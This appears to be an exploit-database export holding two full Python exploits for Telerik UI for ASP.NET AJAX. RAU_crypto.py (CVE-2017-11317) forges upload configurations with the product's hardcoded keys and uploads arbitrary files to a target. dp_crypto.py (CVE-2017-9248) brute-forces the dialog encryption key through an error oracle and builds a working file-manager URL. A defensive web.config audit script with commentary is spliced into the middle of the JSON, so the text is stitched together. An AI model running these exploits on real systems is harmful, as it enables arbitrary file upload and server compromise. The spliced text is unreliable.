https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload\n# https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference\n# http://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security\n\n# http://target/Telerik.Web.UI.WebResource.axd?type=rau\n\nimport sys\nimport base64\nimport json\nimport re\nimport requests\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import HMAC\nfrom Crypto.Hash import SHA256\n\nimport binascii\n\n# Warning, the below prevents certificate warnings,\n# and verify = False in the later code prevents them being verified\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n\nclass RAUCipher:\n key = binascii.unhexlify(\"EB8AF90FDE30FECBE330E807CF0B4252\" +\n \"A44E9F06A2EA4AF10B046F598DD3EA0C\")\n iv = binascii.unhexlify(\"E330E807CF0B425255A3A561A707D269\")\n\n def 
encrypt(plaintext):\n sys.stderr.write(\"Encrypting... \")\n encoded = \"\"\n for i in plaintext:\n encoded = encoded + i + \"\\x00\"\n plaintext = encoded + (\n chr(16 - (len(encoded) % 16)) *\n (16 - (len(encoded) % 16))\n )\n cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)\n sys.stderr.write(\"done\\n\")\n return base64.b64encode(cipher.encrypt(plaintext)).decode()\n\n def decrypt(ciphertext):\n sys.stderr.write(\"Decrypting... \")\n ciphertext = base64.b64decode(ciphertext)\n cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)\n unpad = lambda s: s[0:-ord(chr(s[-1]))]\n sys.stderr.write(\"done\\n\")\n return unpad(cipher.decrypt(ciphertext[0:])).decode()[0::2]\n\n def addHmac(string, Version):\n\n isHmacVersion = False\n\n # \"Encrypt-then-MAC\" feature introduced in R1 2017\n # Required for \"2017.1.118\", \"2017.1.228\", \"2017.2.503\"\n\n if \"2017\" in Version:\n isHmacVersion = True\n\n hmac = HMAC.new(\n b'PrivateKeyForHashOfUploadConfiguration',\n bytes(string.encode()),\n SHA256.new()\n )\n hmac = base64.b64encode(hmac.digest()).decode()\n return string + hmac if isHmacVersion else string\n\n\ndef rauPostData_prep(quiet, TempTargetFolder, Version):\n TargetFolder = RAUCipher.addHmac(\n \"jgas0meSrU/uP/TPzrhDTw==\",\n Version\n )\n TempTargetFolder = RAUCipher.addHmac(\n RAUCipher.encrypt(TempTargetFolder),\n Version\n )\n\n rauJSONplaintext = \\\n '{\"TargetFolder\":\"' + TargetFolder + '\",\"TempTargetFolder\":\"' + \\\n TempTargetFolder + \\\n '\",\"MaxFileSize\":0,\"TimeToLive\":{\"Ticks\":1440000000000,\"Days\":0,\"Hours\":40,\"Minutes\":0,\"Seconds\":0,\"Milliseconds\":0,\"TotalDays\":1.6666666666666666,\"TotalHours\":40,\"TotalMinutes\":2400,\"TotalSeconds\":144000,\"TotalMilliseconds\":144000000},\"UseApplicationPoolImpersonation\":false}'\n if not quiet:\n print(\"JSON: \" + rauJSONplaintext + \"\\n\")\n rauPostData = RAUCipher.encrypt(rauJSONplaintext) + \"&\"\n rauVersionplaintext = \\\n 
\"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=\" + \\\n Version + \\\n \", Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n if not quiet:\n print(\"Version: \" + rauVersionplaintext + \"\\n\")\n rauPostData += RAUCipher.encrypt(rauVersionplaintext)\n return rauPostData\n\n\ndef getVersion(url):\n sys.stderr.write(\"Contacting server... \")\n response = requests.get(url, verify=False)\n html = response.text\n sys.stderr.write(\"done\\n\")\n match = re.search(\n '((?<=\\<\\!-- )20\\d{2}(.\\d+)+(?= --\\>))|' +\n '(?<=Version%3d)20\\d{2}(.\\d+)+(?=%2c)|' +\n '(?<=Version=)20\\d{2}(.\\d+)+(?=,)',\n html\n )\n\n if match:\n return match.group(0)\n else:\n return \"No version result\"\n\n\ndef payload(TempTargetFolder, Version, payload_filename):\n sys.stderr.write(\"file: \" + payload_filename + \"\\n\")\n sys.stderr.write(\"version: \" + Version + \"\\n\")\n sys.stderr.write(\"destination \" + TempTargetFolder + \"\\n\")\n sys.stderr.write(\"Preparing payload... \\n\")\n payload_file = open(payload_filename, \"r\")\n payload_file_data = payload_file.read()\n payload_file.close()\n quiet = True\n\n data = \"-----------------------------68821516528156\\r\\n\"\n data += \"Content-Disposition: form-data; name=\\\"rauPostData\\\"\\r\\n\"\n data += \"\\r\\n\"\n data += rauPostData_prep(quiet, TempTargetFolder, Version) + \"\\r\\n\"\n data += \"-----------------------------68821516528156\\r\\n\"\n data += \"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"blob\\\"\\r\\n\"\n data += \"Content-Type: application/octet-stream\\r\\n\"\n data += \"\\r\\n\"\n data += payload_file_data\n data += \"-----------------------------68821516528156\\r\\n\"\n data += \"Content-Disposition: form-data; name=\\\"fileName\\\"\\r\\n\"\n data += \"\\r\\n\"\n data += \"RAU_crypto.bypass\\r\\n\"\n data += \"-----------------------------68821516528156\\r\\n\"\n data += \"Content-Disposition: form-data; name=\\\"contentType\\\"\\r\\n\"\n data += \"\\r\\n\"\n data 
+= \"text/html\\r\\n\"\n data += \"-----------------------------68821516528156\\r\\n\"\n data += \"Content-Disposition: form-data; name=\\\"lastModifiedDate\\\"\\r\\n\"\n data += \"\\r\\n\"\n data += \"2017-06-28T09:11:28.586Z\\r\\n\"\n data += \"-----------------------------68821516528156\\r\\n\"\n data += \"Content-Disposition: form-data; name=\\\"metadata\\\"\\r\\n\"\n data += \"\\r\\n\"\n data += \"{\\\"TotalChunks\\\":1,\\\"ChunkIndex\\\":0,\\\"TotalFileSize\\\":1,\\\"UploadID\\\":\\\"\" + \\\n payload_filename + \"\\\"}\\r\\n\"\n data += \"-----------------------------68821516528156--\\r\\n\"\n data += \"\\r\\n\"\n sys.stderr.write(\"Payload prep done\\n\")\n return data\n\n\ndef upload(TempTargetFolder, Version, payload_filename, url):\n sys.stderr.write(\"Preparing to upload to \" + url + \"\\n\")\n session = requests.Session()\n request = requests.Request(\n 'POST',\n url,\n data=payload(\n TempTargetFolder,\n Version,\n payload_filename\n )\n )\n request = request.prepare()\n request.headers[\"Content-Type\"] = \\\n \"multipart/form-data; \" +\\\n \"boundary=---------------------------68821516528156\"\n response = session.send(request, verify=False)\n sys.stderr.write(\"Upload done\\n\")\n return response.text\n\n\ndef decode_rauPostData(rauPostData):\n rauPostData = rauPostData.split(\"&\")\n rauJSON = RAUCipher.decrypt(rauPostData[0])\n decoded = \"\\nJSON: \" + rauJSON + \"\\n\"\n TempTargetFolder = json.loads(rauJSON)[\"TempTargetFolder\"]\n decoded = decoded + \"\\nTempTargetFolder = \" + \\\n RAUCipher.decrypt(TempTargetFolder) + \"\\n\"\n rauVersion = RAUCipher.decrypt(rauPostData[1])\n decoded = decoded + \"\\nVersion: \" + rauVersion + \"\\n\"\n return decoded\n\n\ndef mode_decrypt():\n # decrypt ciphertext\n ciphertext = sys.argv[2]\n print(\"\\n\" + RAUCipher.decrypt(ciphertext) + \"\\n\")\n\n\ndef mode_Decrypt_rauPostData():\n # decrypt rauPostData\n rauPostData = sys.argv[2]\n print(decode_rauPostData(rauPostData))\n\n\ndef mode_encrypt():\n 
# encrypt plaintext\n plaintext = sys.argv[2]\n print(\"\\n\" + RAUCipher.encrypt(plaintext) + \"\\n\")\n\n\ndef mode_Encrypt_rauPostData():\n # encrypt rauPostData based on TempTargetFolder and Version\n quiet = False\n TempTargetFolder = sys.argv[2]\n Version = sys.argv[3]\n print(\n \"rauPostData: \" +\n rauPostData_prep(quiet, TempTargetFolder, Version) +\n \"\\n\"\n )\n\n\ndef mode_encrypt_rauPostData_Quiet():\n # as per -E but just output encrypted rauPostData,\n # not the prepared JSON and version\n quiet = True\n TempTargetFolder = sys.argv[2]\n Version = sys.argv[3]\n print(rauPostData_prep(quiet, TempTargetFolder, Version))\n\n\ndef mode_version():\n # extract Telerik web ui version details from url\n url = sys.argv[2]\n print(getVersion(url))\n\n\ndef mode_payload():\n # generate a payload based on TempTargetFolder, Version and payload file\n TempTargetFolder = sys.argv[2]\n Version = sys.argv[3]\n payload_filename = sys.argv[4]\n print(payload(TempTargetFolder, Version, payload_filename))\n\n\ndef mode_Post():\n # generate and upload a payload based on\n # TempTargetFolder, Version, payload file and url\n TempTargetFolder = sys.argv[2]\n Version = sys.argv[3]\n payload_filename = sys.argv[4]\n url = sys.argv[5]\n print(upload(TempTargetFolder, Version, payload_filename, url))\n\n\ndef mode_help():\n print(\n \"Usage:\\n\" +\n \"\\n\" +\n \"Decrypt a plaintext: -d ciphertext\\n\" +\n \"Decrypt rauPostData: -D rauPostData\\n\" +\n \"Encrypt a plaintext: -e plaintext\\n\" +\n \"Gen rauPostData: -E TempTargetFolder Version\\n\" +\n \"Gen rauPostData (quiet): -Q TempTargetFolder Version\\n\" +\n \"Version in HTTP response: -v url\\n\" +\n \"Generate a POST payload: -p TempTargetFolder Version c:\\\\\\\\folder\\\\\\\\filename\\n\" +\n \"Upload a payload: -P TempTargetFolder Version c:\\\\\\\\folder\\\\\\\\filename url\\n\\n\"\n \"Example URL: http://target/Telerik.Web.UI.WebResource.axd?type=rau\"\n )\n\n\nsys.stderr.write(\"\\nRAU_crypto by Paul Taylor / 
Foregenix Ltd.\\n\")\nsys.stderr.write(\n \"CVE-2017-11317 - \" +\n \"Telerik RadAsyncUpload hardcoded keys / arbitrary file upload\\n\\n\"\n )\n\nif len(sys.argv) < 2:\n mode_help()\nelif sys.argv[1] == \"-d\" and len(sys.argv) == 3:\n mode_decrypt()\nelif sys.argv[1] == \"-D\" and len(sys.argv) == 3:\n mode_Decrypt_rauPostData()\nelif sys.argv[1] == \"-e\" and len(sys.argv) == 3:\n mode_encrypt()\nelif sys.argv[1] == \"-E\" and len(sys.argv) == 4:\n mode_Encrypt_rauPostData()\nelif sys.argv[1] == \"-Q\" and len(sys.argv) == 4:\n mode_encrypt_rauPostData_Quiet()\nelif sys.argv[1] == \"-v\" and len(sys.argv) == 3:\n mode_version()\nelif sys.argv[1] == \"-p\" and len(sys.argv) == 5:\n mode_payload()\nelif sys.argv[1] == \"-P\" and len(sys.argv) == 6:\n mode_Post()\nelse:\n mode_help()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:51", "description": "\nTelerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Encryption Keys Disclosure", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-24T00:00:00", "title": "Telerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Encryption Keys Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
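The web.config conditions the entries above turn on, written as an added example that is neither Telerik's nor Hitachi ABB Power Grids' guidance verbatim and is not part of this page: the NVD text for CVE-2019-19790 says to remove the ChartHttpHandler mapping, CVE-2017-9248 names Telerik.Web.UI.DialogParametersEncryptionKey, and RAU_crypto shows the built-in AES key and the HMAC secret PrivateKeyForHashOfUploadConfiguration that RadAsyncUpload uses when no per-application keys are configured. The appSettings names Telerik.AsyncUpload.ConfigurationEncryptionKey and Telerik.Upload.ConfigurationHashKey are taken from Telerik's RadAsyncUpload security guidance as I recall it and should be checked against the installed version's documentation; both sample configs are constructed.

```python
import xml.etree.ElementTree as ET
from typing import List, Tuple

# appSettings names from Telerik's RadAsyncUpload / DialogHandler security
# guidance (assumed here; only DialogParametersEncryptionKey is named on this page).
RAU_ENCRYPTION_KEY = "Telerik.AsyncUpload.ConfigurationEncryptionKey"
RAU_HASH_KEY = "Telerik.Upload.ConfigurationHashKey"
DIALOG_KEY = "Telerik.Web.UI.DialogParametersEncryptionKey"
# Built-in HMAC secret RAU_crypto's addHmac() uses for R1 2017+ builds when no
# custom hash key is configured.
DEFAULT_RAU_HASH_KEY = "PrivateKeyForHashOfUploadConfiguration"
CHART_HANDLER = "Telerik.Web.UI.ChartHttpHandler"

Finding = Tuple[str, str]  # (CVE the finding relates to, detail)


def audit_web_config(xml_text: str) -> List[Finding]:
    """Flag the configuration conditions the entries above depend on."""
    root = ET.fromstring(xml_text)
    adds = list(root.iter("add"))
    settings = {a.get("key"): (a.get("value") or "") for a in adds if a.get("key")}
    findings: List[Finding] = []

    # CVE-2019-19790: NVD's fix is to remove the RadChart handler mapping.
    # <httpHandlers> and <system.webServer><handlers> both use <add type=...>,
    # with or without an assembly suffix after a comma.
    for add in adds:
        type_name = (add.get("type") or "").split(",")[0].strip()
        if type_name == CHART_HANDLER:
            findings.append(("CVE-2019-19790",
                             f"{CHART_HANDLER} mapped at '{add.get('path')}'; remove it"))

    # CVE-2017-11317 (and the CVE-2019-18935 chain, which needs known keys):
    # without per-application keys, rauPostData is encrypted and signed with
    # the defaults RAU_crypto carries, so the upload configuration is forgeable.
    if not settings.get(RAU_ENCRYPTION_KEY):
        findings.append(("CVE-2017-11317",
                         f"{RAU_ENCRYPTION_KEY} not set; default RadAsyncUpload key in use"))
    hash_key = settings.get(RAU_HASH_KEY)
    if not hash_key or hash_key == DEFAULT_RAU_HASH_KEY:
        findings.append(("CVE-2017-11317",
                         f"{RAU_HASH_KEY} not set or default; rauPostData HMAC is forgeable"))

    # CVE-2017-9248: with no dialog key, DialogHandler falls back to the
    # MachineKey, which is what the dp_crypto oracle then recovers.
    if not settings.get(DIALOG_KEY):
        findings.append(("CVE-2017-9248",
                         f"{DIALOG_KEY} not set; DialogHandler protected by the MachineKey only"))
    return findings


# Constructed samples (not from eSOMS or Telerik): a pre-hardening web.config,
# and one with per-application keys set and the chart handler removed. The
# key values are placeholders; generate long random secrets per application.
WEAK_CONFIG = """<configuration>
  <appSettings>
    <add key="Telerik.Skin" value="Default" />
  </appSettings>
  <system.web>
    <httpHandlers>
      <add path="ChartImage.axd" type="Telerik.Web.UI.ChartHttpHandler" verb="*" validate="false" />
      <add path="Telerik.Web.UI.WebResource.axd" type="Telerik.Web.UI.WebResource" verb="*" validate="false" />
      <add path="Telerik.Web.UI.DialogHandler.aspx" type="Telerik.Web.UI.DialogHandler" verb="*" validate="false" />
    </httpHandlers>
  </system.web>
</configuration>"""

HARDENED_CONFIG = """<configuration>
  <appSettings>
    <add key="Telerik.AsyncUpload.ConfigurationEncryptionKey" value="Per-App-Secret-Replace-Me-0123456789abcdef" />
    <add key="Telerik.Upload.ConfigurationHashKey" value="Per-App-Hash-Secret-Replace-Me-fedcba9876543210" />
    <add key="Telerik.Web.UI.DialogParametersEncryptionKey" value="Per-App-Dialog-Secret-Replace-Me-0a1b2c3d4e5f" />
  </appSettings>
  <system.web>
    <httpHandlers>
      <add path="Telerik.Web.UI.WebResource.axd" type="Telerik.Web.UI.WebResource, Telerik.Web.UI" verb="*" validate="false" />
      <add path="Telerik.Web.UI.DialogHandler.aspx" type="Telerik.Web.UI.DialogHandler, Telerik.Web.UI" verb="*" validate="false" />
    </httpHandlers>
  </system.web>
</configuration>"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_web_config(cfg) or "no findings")
```

Setting custom keys is a compensating control, not the fix: on builds before R2 2017 SP1 the keys only raise the bar for CVE-2017-11317, and a build at or below 2019.3.1023 stays exposed to CVE-2019-18935 as soon as the keys leak, so the upgrade the advisory calls for is still required.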
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2018-01-24T00:00:00", "id": "EXPLOITPACK:C25B99FCFCE90C12FBCCCC43A0BEB5F4", "href": "", "sourceData": "# Exploit Title: Telerik UI for ASP.NET AJAX DialogHandler Dialog cracker\n# Filename: dp_crypto.py\n# Github: https://github.com/bao7uo/dp_crypto\n# Date: 2018-01-23\n\n# Exploit Author: Paul Taylor / Foregenix Ltd\n# Website: http://www.foregenix.com/blog\n\n# Version: Telerik UI for ASP.NET AJAX\n# CVE: CVE-2017-9248\n# Vendor Advisory: https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness\n\n# Tested on: Working on versions 2012.3.1308 thru 2017.1.118 (.NET 35, 40, 45)\n\n#!/usr/bin/python3\n\n# Author: Paul Taylor / Foregenix Ltd\n\n# https://github.com/bao7uo/dp_crypto/blob/master/dp_crypto.py\n\n# dp_crypto - CVE-2017-9248 exploit\n# Telerik.Web.UI.dll Cryptographic compromise\n\n# Warning - no cert warnings,\n# and verify = False in code below prevents verification\n\nimport sys\nimport base64\nimport requests\nimport re\nimport binascii\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nrequests_sent = 0\nchar_requests = 0\n\n\ndef get_result(plaintext, key, session, pad_chars):\n global requests_sent, char_requests\n\n url = sys.argv[2]\n base_pad = (len(key) % 4)\n base = '' if base_pad == 0 else pad_chars[0:4 - base_pad]\n dp_encrypted = base64.b64encode(\n (encrypt(plaintext, key) + base).encode()\n ).decode()\n request = requests.Request('GET', url + '?dp=' + dp_encrypted)\n request = request.prepare()\n response = session.send(request, verify=False)\n requests_sent += 1\n char_requests += 1\n\n match = re.search(\"(Error Message:)(.+\\n*.+)(</div>)\", response.text)\n return True \\\n if match is not None \\\n and match.group(2) == \"Index was outside the bounds of the array.\" \\\n 
else False\n\n\ndef test_keychar(keychar, found, session, pad_chars):\n base64chars = [\n \"A\", \"Q\", \"g\", \"w\", \"B\", \"R\", \"h\", \"x\", \"C\", \"S\", \"i\", \"y\",\n \"D\", \"T\", \"j\", \"z\", \"E\", \"U\", \"k\", \"0\", \"F\", \"V\", \"l\", \"1\",\n \"G\", \"W\", \"m\", \"2\", \"H\", \"X\", \"n\", \"3\", \"I\", \"Y\", \"o\", \"4\",\n \"J\", \"Z\", \"p\", \"5\", \"K\", \"a\", \"q\", \"6\", \"L\", \"b\", \"r\", \"7\",\n \"M\", \"c\", \"s\", \"8\", \"N\", \"d\", \"t\", \"9\", \"O\", \"e\", \"u\", \"+\",\n \"P\", \"f\", \"v\", \"/\"\n ]\n\n duff = False\n accuracy_thoroughness_threshold = sys.argv[5]\n for bc in range(int(accuracy_thoroughness_threshold)):\n # ^^ max is len(base64chars)\n sys.stdout.write(\"\\b\\b\" + base64chars[bc] + \"]\")\n sys.stdout.flush()\n if not get_result(\n base64chars[0] * len(found) + base64chars[bc],\n found + keychar, session, pad_chars\n ):\n duff = True\n break\n return False if duff else True\n\n\ndef encrypt(dpdata, key):\n encrypted = []\n k = 0\n for i in range(len(dpdata)):\n encrypted.append(chr(ord(dpdata[i]) ^ ord(key[k])))\n k = 0 if k >= len(key) - 1 else k + 1\n return ''.join(str(e) for e in encrypted)\n\n\ndef mode_decrypt():\n ciphertext = base64.b64decode(sys.argv[2].encode()).decode()\n key = sys.argv[3]\n print(base64.b64decode(encrypt(ciphertext, key)).decode())\n print(\"\")\n\n\ndef mode_encrypt():\n plaintext = sys.argv[2]\n key = sys.argv[3]\n\n plaintext = base64.b64encode(plaintext.encode()).decode()\n print(base64.b64encode(encrypt(plaintext, key).encode()).decode())\n print(\"\")\n\n\ndef test_keypos(key_charset, unprintable, found, session):\n pad_chars = ''\n for pad_char in range(256):\n pad_chars += chr(pad_char)\n\n for i in range(len(pad_chars)):\n for k in range(len(key_charset)):\n keychar = key_charset[k]\n sys.stdout.write(\"\\b\"*6)\n sys.stdout.write(\n (\n keychar\n if unprintable is False\n else '+'\n ) +\n \") [\" + (\n keychar\n if unprintable is False\n else '+'\n ) +\n \"]\"\n 
)\n sys.stdout.flush()\n if test_keychar(keychar, found, session, pad_chars[i] * 3):\n return keychar\n return False\n\n\ndef get_key(session):\n global char_requests\n found = ''\n unprintable = False\n\n key_length = sys.argv[3]\n key_charset = sys.argv[4]\n if key_charset == 'all':\n unprintable = True\n key_charset = ''\n for i in range(256):\n key_charset += chr(i)\n else:\n if key_charset == 'hex':\n key_charset = '01234567890ABCDEF'\n\n print(\"Attacking \" + sys.argv[2])\n print(\n \"to find key of length [\" +\n str(key_length) +\n \"] with accuracy threshold [\" +\n sys.argv[5] +\n \"]\"\n )\n print(\n \"using key charset [\" +\n (\n key_charset\n if unprintable is False\n else '- all ASCII -'\n ) +\n \"]\\n\"\n )\n for i in range(int(key_length)):\n pos_str = (\n str(i + 1)\n if i > 8\n else \"0\" + str(i + 1)\n )\n sys.stdout.write(\"Key position \" + pos_str + \": (------\")\n sys.stdout.flush()\n keychar = test_keypos(key_charset, unprintable, found, session)\n if keychar is not False:\n found = found + keychar\n sys.stdout.write(\n \"\\b\"*7 + \"{\" +\n (\n keychar\n if unprintable is False\n else '0x' + binascii.hexlify(keychar.encode()).decode()\n ) +\n \"} found with \" +\n str(char_requests) +\n \" requests, total so far: \" +\n str(requests_sent) +\n \"\\n\"\n )\n sys.stdout.flush()\n char_requests = 0\n else:\n sys.stdout.write(\"\\b\"*7 + \"Not found, quitting\\n\")\n sys.stdout.flush()\n break\n if keychar is not False:\n print(\"Found key: \" +\n (\n found\n if unprintable is False\n else \"(hex) \" + binascii.hexlify(found.encode()).decode()\n )\n )\n print(\"Total web requests: \" + str(requests_sent))\n return found\n\n\ndef mode_brutekey():\n session = requests.Session()\n found = get_key(session)\n\n if found == '':\n return\n else:\n urls = {}\n url_path = sys.argv[2]\n params = (\n '?DialogName=DocumentManager' +\n '&renderMode=2' +\n '&Skin=Default' +\n '&Title=Document%20Manager' +\n '&dpptn=' +\n '&isRtl=false' +\n '&dp='\n )\n 
versions = [\n '2007.1423', '2007.1521', '2007.1626', '2007.2918',\n '2007.21010', '2007.21107', '2007.31218', '2007.31314',\n '2007.31425', '2008.1415', '2008.1515', '2008.1619',\n '2008.2723', '2008.2826', '2008.21001', '2008.31105',\n '2008.31125', '2008.31314', '2009.1311', '2009.1402',\n '2009.1527', '2009.2701', '2009.2826', '2009.31103',\n '2009.31208', '2009.31314', '2010.1309', '2010.1415',\n '2010.1519', '2010.2713', '2010.2826', '2010.2929',\n '2010.31109', '2010.31215', '2010.31317', '2011.1315',\n '2011.1413', '2011.1519', '2011.2712', '2011.2915',\n '2011.31115', '2011.3.1305', '2012.1.215', '2012.1.411',\n '2012.2.607', '2012.2.724', '2012.2.912', '2012.3.1016',\n '2012.3.1205', '2012.3.1308', '2013.1.220', '2013.1.403',\n '2013.1.417', '2013.2.611', '2013.2.717', '2013.3.1015',\n '2013.3.1114', '2013.3.1324', '2014.1.225', '2014.1.403',\n '2014.2.618', '2014.2.724', '2014.3.1024', '2015.1.204',\n '2015.1.225', '2015.1.401', '2015.2.604', '2015.2.623',\n '2015.2.729', '2015.2.826', '2015.3.930', '2015.3.1111',\n '2016.1.113', '2016.1.225', '2016.2.504', '2016.2.607',\n '2016.3.914', '2016.3.1018', '2016.3.1027', '2017.1.118',\n '2017.1.228', '2017.2.503', '2017.2.621', '2017.2.711',\n '2017.3.913'\n ]\n\n plaintext1 = 'EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,'\n plaintext2_raw1 = 'Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version='\n plaintext2_raw3 = ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'\n plaintext3 = ';AllowMultipleSelection,False,3,False'\n\n for version in versions:\n 
plaintext2_raw2 = version\n plaintext2 = base64.b64encode(\n (plaintext2_raw1 +\n plaintext2_raw2 +\n plaintext2_raw3\n ).encode()\n ).decode()\n plaintext = plaintext1 + plaintext2 + plaintext3\n plaintext = base64.b64encode(\n plaintext.encode()\n ).decode()\n ciphertext = base64.b64encode(\n encrypt(\n plaintext,\n found\n ).encode()\n ).decode()\n full_url = url_path + params + ciphertext\n urls[version] = full_url\n\n found_valid_version = False\n for version in urls:\n url = urls[version]\n request = requests.Request('GET', url)\n request = request.prepare()\n response = session.send(request, verify=False)\n if response.status_code == 500:\n continue\n else:\n match = re.search(\n \"(Error Message:)(.+\\n*.+)(</div>)\",\n response.text\n )\n if match is None:\n print(version + \": \" + url)\n found_valid_version = True\n break\n\n if not found_valid_version:\n print(\"No valid version found\")\n\ndef mode_samples():\n print(\"Samples for testing decryption and encryption functions:\")\n print(\"-d ciphertext key\")\n print(\"-e plaintext key\")\n print(\"\")\n print(\"Key:\")\n print(\"DC50EEF37087D124578FD4E205EFACBE0D9C56607ADF522D\")\n print(\"\")\n print(\"Plaintext:\")\n print(\"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,VGVsZXJpay5XZWIuVUkuRWRpdG9yLkRpYWxvZ0NvbnRyb2xzLkRvY3VtZW50TWFuYWdlckRpYWxvZywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxNi4yLjUwNC40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0;AllowMultipleSelection,False,3,False\")\n print(\"\")\n print(\"Ciphertext:\")\n 
print(\"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\")\n print(\"\")\n\n\ndef mode_b64e():\n print(base64.b64encode(sys.argv[2].encode()).decode())\n print(\"\")\n\n\ndef mode_b64d():\n print(base64.b64decode(sys.argv[2].encode()).decode())\n print(\"\")\n\n\ndef mode_help():\n print(\"Usage:\")\n print(\"\")\n print(\"Decrypt a ciphertext: -d ciphertext key\")\n print(\"Encrypt a plaintext: -e plaintext key\")\n print(\"Bruteforce key/generate URL: -k url key_length key_charset accuracy\")\n print(\"Encode parameter to base64: -b plain_parameter\")\n print(\"Decode base64 parameter: -p encoded_parameter\")\n print(\"\")\n print(\"To test all ascii characters set key_charset to: all, \" +\n \"for upper case hex (e.g. machine key) set to hex.\")\n print(\"\")\n print(\"Maximum accuracy is out of 64 where 64 is the most accurate, \" +\n \"accuracy of 9 will usually suffice for a hex, but 21 or more \" +\n \"might be needed when testing all ascii characters.\")\n print(\"Increase the accuracy argument if no valid version is found.\")\n print(\"\")\n print(\"Examples to generate a valid file manager URL:\")\n print(\"./dp_crypto.py -k http://a/Telerik.Web.UI.DialogHandler.aspx 48 hex 9\")\n print(\"./dp_crypto.py -k http://a/Telerik.Web.UI.DialogHandler.aspx 48 all 21\")\n print(\"\")\n\n\nsys.stderr.write(\n \"\\ndp_crypto by Paul Taylor / Foregenix Ltd\\nCVE-2017-9248 - \" +\n \"Telerik.Web.UI.dll Cryptographic compromise\\n\\n\"\n )\n\nif len(sys.argv) < 2:\n mode_help()\n\nelif sys.argv[1] == \"-d\" and len(sys.argv) == 4:\n mode_decrypt()\nelif sys.argv[1] == \"-e\" and len(sys.argv) == 4:\n mode_encrypt()\nelif sys.argv[1] == \"-k\" and len(sys.argv) == 6:\n mode_brutekey()\nelif sys.argv[1] == \"-s\" and len(sys.argv) == 2:\n mode_samples()\nelif sys.argv[1] == \"-b\" and len(sys.argv) == 3:\n mode_b64e()\nelif sys.argv[1] == \"-p\" and len(sys.argv) == 3:\n mode_b64d()\nelse:\n mode_help()", "cvss": {"score": 7.5, "vector": 
